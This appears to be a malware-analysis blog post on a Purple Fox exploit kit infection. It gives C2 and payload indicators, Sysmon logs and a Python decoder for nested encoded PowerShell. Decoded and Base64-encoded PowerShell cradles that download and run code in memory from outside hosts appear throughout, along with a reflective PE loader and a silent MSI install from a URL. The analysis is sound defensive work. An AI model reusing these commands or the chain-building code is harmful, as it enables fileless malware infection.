Purple Fox Exploit Kit drops fileless malware

Purple Fox Exploit Kit is known to distribute fileless malware: its stages are PowerShell scripts pulled straight into memory with IEX and a PE loaded with Invoke-ReflectivePEInjection, as the decoded commands below show. I did not see a payload dropped, confirming fileless activity. For a more detailed analysis of Purple Fox, see Trend Micro's blog – https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected" (all lowercase).

PCAP file of the infection traffic:
2019-12-05-PurplefoxEK-pcap.zip


ASSOCIATED DOMAINS:

104.24.120.105 – squeakycarworld.store – REDIRECT TO PURPLE FOX EK
172.64.109.8 – rawcdn.githack.com – GET /C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/pe.jpg – PURPLE FOX PAYLOAD (PowerShell script run with IEX; it supplies Invoke-ReflectivePEInjection)
172.64.109.8 – rawcdn.githack.com – GET /C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/1808164.jpg – PURPLE FOX PAYLOAD (PE loaded reflectively via -PEUrl)
104.31.64.70 – raw.githack.xyz – GET /PCWGZVOA1.jpg – PURPLE FOX PAYLOAD (first-stage PowerShell fetched with DownloadString and run with IEX)
193.108.118.167 – www.gotocom.xyz – POST INFECTION C2
news.onetouchauthentication.club – DNS ONLY – PURPLE FOX EK STYLE DOMAIN
193.108.118.167 – news.onetouchauthentication.icu – PURPLE FOX EK
193.108.118.167 – www.topvipsr.xyz – POST INFECTION C2
193.108.118.167 – www.topvipdg.me – POST INFECTION C2
38.75.137.14 – bestip.tech:9000 – GET /preview – POST INFECTION C2
38.75.137.14 – bestip.tech:9000 – GET /msg/notify/?token=gqF0zl3pWLGha84AAI2B – POST INFECTION C2

Note on the IPs: 104.24.120.105, 104.31.64.70 and 172.64.109.8 are Cloudflare edge addresses, and rawcdn.githack.com is a legitimate CDN front for GitHub content (the path is user/repo/commit/file), so block and hunt on the hostnames, the GitHub account and repository in the path, and the URL paths rather than on those IPs. 193.108.118.167 and 38.75.137.14 are the C2 hosts themselves.

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:


Shown above: Sysmon Event ID 1 (process creation) for a PowerShell process with a Base64 -EncodedCommand in the command line

DECODED BASE64 (www.base64decode.org; the -EncodedCommand value is Base64 of the script as UTF-16LE, so decode it as UTF-16 or strip the interleaved null bytes):

IEX (New-Object Net.WebClient).DownloadString('https://raw.githack.xyz/PCWGZVOA1.jpg') – first stage: fetches the next script from raw.githack.xyz and runs it in memory with IEX; nothing is written to disk


[Sysmon Event ID 3 – 32-bit (SysWOW64) PowerShell making a network connection to raw.githack.xyz]
Image C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
DestinationIp 104.31.64.70
DestinationHostname
DestinationPort 443
DestinationPortName https

[Sysmon Event ID 1 – PowerShell process creation with Base64 code in the command line; the 32-bit parent launches 64-bit PowerShell through the C:\Windows\sysnative alias, the path a 32-bit process uses to reach the 64-bit System32]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand 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
CurrentDirectory C:\Users\Ricky\Desktop\
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMQAuAGoAcABnACcAKQANAAoA

DECODED BASE64 (www.base64decode.org):

IEX (New-Object Net.WebClient).DownloadString('https://rawcdn.githack.com/C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/pe.jpg');Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/1808164.jpg -ExeArgs '"powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand 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"' -ForceA

Second stage: pe.jpg is a PowerShell script (it supplies Invoke-ReflectivePEInjection, the PowerSploit reflective loader) executed in memory with IEX; 1808164.jpg is the PE that gets reflectively loaded straight from the URL, and -ExeArgs hands that PE yet another Base64 -EncodedCommand (elided here; the full string is in the ParentCommandLine of the next event). That third layer decodes to an Add-Type block that P/Invokes msi.dll, followed by [msi]::MsiSetInternalUI(2,0) and [msi]::MsiInstallProduct("https://raw.githack.xyz/1DHRBFPLZTEQRRBUB.jpg",""), i.e. a silent MSI install directly from the URL, which is where the msiexec.exe parents further down come from.
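The decoded command above is only one layer: the -ExeArgs value carries another -EncodedCommand, and the ParentCommandLine of the next event carries the whole chain. The following Python script, added here as an editor's example and not part of the original post or of the Purple Fox code, peels nested -EncodedCommand values (Base64 of UTF-16LE text) layer by layer and pulls out the URLs, which a web decoder will not do for you. The three-layer sample it runs on is constructed to mirror this page's chain (same structure and URLs; the Base64 is regenerated rather than copied from the log lines), and the msi.dll P/Invoke in the innermost layer is a shortened form of what the third layer decodes to.

```python
import base64
import re

# PowerShell accepts -EncodedCommand and unambiguous prefixes of it (-enc, -ec, -e are the
# usual ones); the value is the script encoded as UTF-16LE and then Base64. Quotes before the
# blob are tolerated because the -ExeArgs layer wraps the inner command line in '"..."'.
ENCODED_SWITCH = re.compile(
    r"-(?:EncodedCommand|enc|ec|e)\s+[\"']*([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>()]+")


def decode_layer(blob):
    """Decode one -EncodedCommand value; tolerates Base64 whose padding was stripped."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def unwrap(command_line, max_depth=8):
    """Peel every nested -EncodedCommand layer, outermost first.

    Element 0 is the command line as given; element n is the decoded script of layer n.
    Stops when a layer holds no further encoded switch or the blob does not decode.
    """
    layers = [command_line]
    current = command_line
    for _ in range(max_depth):
        match = ENCODED_SWITCH.search(current)
        if not match:
            break
        try:
            current = decode_layer(match.group(1))
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(current)
    return layers


def urls_in(layers):
    """Every distinct URL across all layers, in the order it first appears."""
    found = []
    for layer in layers:
        for url in URL.findall(layer):
            if url not in found:
                found.append(url)
    return found


def encode_ps(script):
    """The encoding PowerShell expects; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed three-layer chain mirroring the events on this page (not copied from the log).
STAGE3 = (
    'Add-Type -TypeDefinition @"\r\n'
    "using System;\r\nusing System.Runtime.InteropServices;\r\n"
    "public static class msi {\r\n"
    '[DllImport("msi.dll", CharSet=CharSet.Auto)]\r\n'
    "public static extern int MsiInstallProduct(string packagePath, string commandLine);\r\n"
    '[DllImport("msi.dll")]\r\n'
    "public static extern int MsiSetInternalUI(int dwUILevel, IntPtr phWnd);\r\n"
    '}\r\n"@\r\n'
    "$path = 'https://raw.githack.xyz/1DHRBFPLZTEQRRBUB.jpg';\r\n"
    "[msi]::MsiSetInternalUI(2,0);\r\n"
    '[msi]::MsiInstallProduct("$path","")\r\n'
)
REPO = "https://rawcdn.githack.com/C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6"
STAGE2 = (
    f"IEX (New-Object Net.WebClient).DownloadString('{REPO}/pe.jpg');"
    f"Invoke-ReflectivePEInjection -PEUrl {REPO}/1808164.jpg "
    "-ExeArgs '\"powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand "
    + encode_ps(STAGE3) + "\"' -ForceA"
)
SAMPLE_COMMAND_LINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-nop -windowstyle hidden -exec bypass -EncodedCommand " + encode_ps(STAGE2)
)

if __name__ == "__main__":
    chain = unwrap(SAMPLE_COMMAND_LINE)
    for depth, layer in enumerate(chain):
        print(f"--- layer {depth} ---\n{layer}")
    print("URLs:", *urls_in(chain), sep="\n  ")
```

Feed `unwrap()` the ParentCommandLine strings from the events on this page and it returns the same decoded commands shown here, with the -ExeArgs layer as a third element; `urls_in()` gives you the download URLs for blocking without having to read through the script text.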

I PROVIDED THE REMAINING PROCESS CREATIONS AND NETWORK CONNECTIONS FOR ADDITIONAL RESEARCH AGAINST THE MITRE ATT&CK FRAMEWORK – https://attack.mitre.org/

[Sysmon Event ID 1 – PowerShell spawned by the 64-bit loader; the ParentCommandLine below carries the complete nested -EncodedCommand, including the -ExeArgs layer that is elided above]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand 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
CurrentDirectory C:\Users\Ricky\Desktop\
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe” powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEAOAAwADgAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABB
AEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBB
AHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA

[Sysmon Event ID 3 – msdtc.exe making an outbound HTTPS connection to the C2 at 193.108.118.167, running as the logged-on user rather than as the MSDTC service account; the Distributed Transaction Coordinator has no reason to reach the internet, so this is a strong hunting signal on its own]
Image C:\Windows\System32\msdtc.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 193.108.118.167
DestinationHostname 167-118-108-193.clients.gthost.com
DestinationPort 443
DestinationPortName https

[Sysmon Event ID 3 – wusa.exe (Windows Update Standalone Installer) making an outbound HTTPS connection to the same C2]
Image C:\Windows\System32\wusa.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 193.108.118.167
DestinationHostname 167-118-108-193.clients.gthost.com
DestinationPort 443
DestinationPortName https

[Sysmon Event ID 3 – 64-bit PowerShell connecting to rawcdn.githack.com (172.64.109.8) for the second-stage script and PE]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 172.64.109.8
DestinationHostname
DestinationPort 443
DestinationPortName https

[Sysmon Event ID 3 – wusa.exe connecting to bestip.tech:9000 (38.75.137.14), the post-infection C2 seen in the pcap]
Image C:\Windows\System32\wusa.exe
User Ricky-PC\Ricky
Protocol tcp
DestinationIp 38.75.137.14
DestinationHostname
DestinationPort 9000
DestinationPortName

[Sysmon Event ID 1 – the first-stage script relaunching 64-bit PowerShell via sysnative with the loader as its -EncodedCommand]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand 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
CurrentDirectory C:\Users\Ricky\Desktop\
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMQAuAGoAcABnACcAKQANAAoA

[Sysmon Event ID 1 – PowerShell spawned by the 64-bit loader, still running as the logged-on user]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand 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
CurrentDirectory C:\Users\Ricky\Desktop\
User Ricky-PC\Ricky
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand 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

[Sysmon Event ID 1 – the loader re-run as NT AUTHORITY\SYSTEM; the ParentCommandLine below decodes to the same Invoke-ReflectivePEInjection command as before but with -PEUrl https://rawcdn.githack.com/C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/1505164.jpg instead of 1808164.jpg, so a privilege escalation took place between the user-level and SYSTEM-level runs]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand 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
CurrentDirectory C:\Users\Ricky\Desktop\
User NT AUTHORITY\SYSTEM
LogonGuid {4040f843-457e-5de9-0000-0020e7030000}
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEANQAwADUAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBC
AGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwB